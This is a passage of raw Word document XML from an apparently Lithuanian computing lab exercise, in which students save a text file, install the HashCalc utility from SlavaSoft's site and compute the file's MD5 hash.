      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Programoje įveskite tekstą</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32201713" w14:textId="1693CE83" w:rsidR="000E1002" w:rsidRPr="005A5C28" w:rsidRDefault="0A4A3DF5" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F66224D" wp14:editId="00E2EC60">
            <wp:extent cx="4229690" cy="1257475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="48" name="Paveikslėlis 48" descr="*Be pavadinimo – Užraši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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId253">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4229690" cy="1257475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA54B59" w14:textId="5661054E" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="006D4299" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. Užrašinė</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469F852F" w14:textId="5E9F7258" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: Zykas A. (2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C06D200" w14:textId="52FE90B2" w:rsidR="00804982" w:rsidRPr="005A5C28" w:rsidRDefault="00804982" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failas &gt; Įrašyti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5508FBC3" w14:textId="1A49CA9E" w:rsidR="009A5D0E" w:rsidRPr="005A5C28" w:rsidRDefault="009A5D0E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Eikite į </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Darbalaukis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC3ED6" w14:textId="3C2DD547" w:rsidR="00BE3FF2" w:rsidRPr="005A5C28" w:rsidRDefault="007B00C1" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Lauke </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failo vardas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: įveskite </w:t>
      </w:r>
      <w:r w:rsidR="00686678" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Įrašyti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D1DDF" w14:textId="5EFD0F60" w:rsidR="0051124B" w:rsidRPr="005A5C28" w:rsidRDefault="0051124B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Suraskite internete maišos algoritmo skaičiuoklę, parsisiųskite ir įdiekite (rekomendacija: paieškai naudoti frazę HashCalc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D43C080" w14:textId="09843964" w:rsidR="00D61911" w:rsidRPr="005A5C28" w:rsidRDefault="005F7160" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Žiniatinklio naršyklę ir eikite į</w:t>
      </w:r>
      <w:r w:rsidR="00CC41DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId254" w:history="1">
        <w:r w:rsidR="00CC41DF" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.slavasoft.com/download.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C5B5FF6" w14:textId="67FBAE2F" w:rsidR="00CC41DF" w:rsidRPr="005A5C28" w:rsidRDefault="72AB56A7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57CB5458" wp14:editId="7F32B4DA">
            <wp:extent cx="4213860" cy="3619647"/>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pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId255">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4213860" cy="3619647"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35800456" w14:textId="3C9D940E" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="006D4299" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>av. SlavaSoft tinklalapio vaizdas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B568449" w14:textId="77777777" w:rsidR="002C3B85" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: Zykas A. (2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5637E9" w14:textId="77777777" w:rsidR="00274CA1" w:rsidRPr="005A5C28" w:rsidRDefault="00274CA1" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B125D40" w14:textId="1BD664AB" w:rsidR="005A36D4" w:rsidRPr="005A5C28" w:rsidRDefault="00604023" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Eilutėje </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HashCalc 2.02</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Atsisiųsti</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD3147" w14:textId="6A2557C0" w:rsidR="00C23B91" w:rsidRPr="005A5C28" w:rsidRDefault="00C23B91" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atidarykite "</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hashcalc.zip</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">“ failą ir paleiskite sąrankos </w:t>
      </w:r>
      <w:r w:rsidR="00261F9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> failą</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119D2937" w14:textId="7AFC36E2" w:rsidR="00553D8F" w:rsidRPr="005A5C28" w:rsidRDefault="00ED2D32" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Norėdami įdiegti HashCalc, vadovaukitės diegimo vedliu</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A614BC2" w14:textId="7AAA741A" w:rsidR="00D03BD5" w:rsidRPr="005A5C28" w:rsidRDefault="00700994" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Paskutiniu ekranu spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Baigti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir, jei jis atidarytas, uždarykite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>README</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> failą. Jei norite, galite perskaityti failą</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A90A7E" w14:textId="7F7C32F9" w:rsidR="001E5B5C" w:rsidRPr="005A5C28" w:rsidRDefault="001E5B5C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HashCalc</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> dabar įdiegtas ir veikia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E872B07" w14:textId="071FFBA3" w:rsidR="004B23BD" w:rsidRPr="005A5C28" w:rsidRDefault="656456B8" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13370DAC" wp14:editId="54C9728E">
            <wp:extent cx="2781935" cy="3400143"/>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6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2781935" cy="3400143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D521BB" w14:textId="19275CF3" w:rsidR="00274CA1" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00274CA1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. </w:t>
      </w:r>
      <w:r w:rsidR="00D37D1F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HashCalc programinė įranga</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187BFF3E" w14:textId="77777777" w:rsidR="00274CA1" w:rsidRPr="005A5C28" w:rsidRDefault="00274CA1"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71054280" w14:textId="77777777" w:rsidR="00274CA1" w:rsidRPr="005A5C28" w:rsidRDefault="00274CA1" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677FC994" w14:textId="2DDE63BB" w:rsidR="0051124B" w:rsidRPr="005A5C28" w:rsidRDefault="0051124B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Naudodami įdiegtą programinę įrangą parinkite algoritmą MD5 ir išsaugotam failui suskaičiuokite maišos eilę (angl. HASH). Rezultatą išsisaugokite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A4D400" w14:textId="3EF69052" w:rsidR="00D867C1" w:rsidRPr="005A5C28" w:rsidRDefault="00F12A2C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nustatykite šiuos elementus HashCalc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B822B" w14:textId="11EF51CF" w:rsidR="00F12A2C" w:rsidRPr="005A5C28" w:rsidRDefault="00F4374B" w:rsidP="00131ECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="284" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Duomenų formatas: failas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2522277A" w14:textId="350B0DDA" w:rsidR="00F4374B" w:rsidRPr="005A5C28" w:rsidRDefault="00240813" w:rsidP="00131ECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="284" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Duomenys: Spustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.. mygtuką šalia lauko Duomenys, eikite į darbalaukį ir pasirinkite hash.txt failą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3B6FF9" w14:textId="56BE8B40" w:rsidR="00D30046" w:rsidRPr="005A5C28" w:rsidRDefault="00AC083D" w:rsidP="00131ECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="284" w:firstLine="0"/>
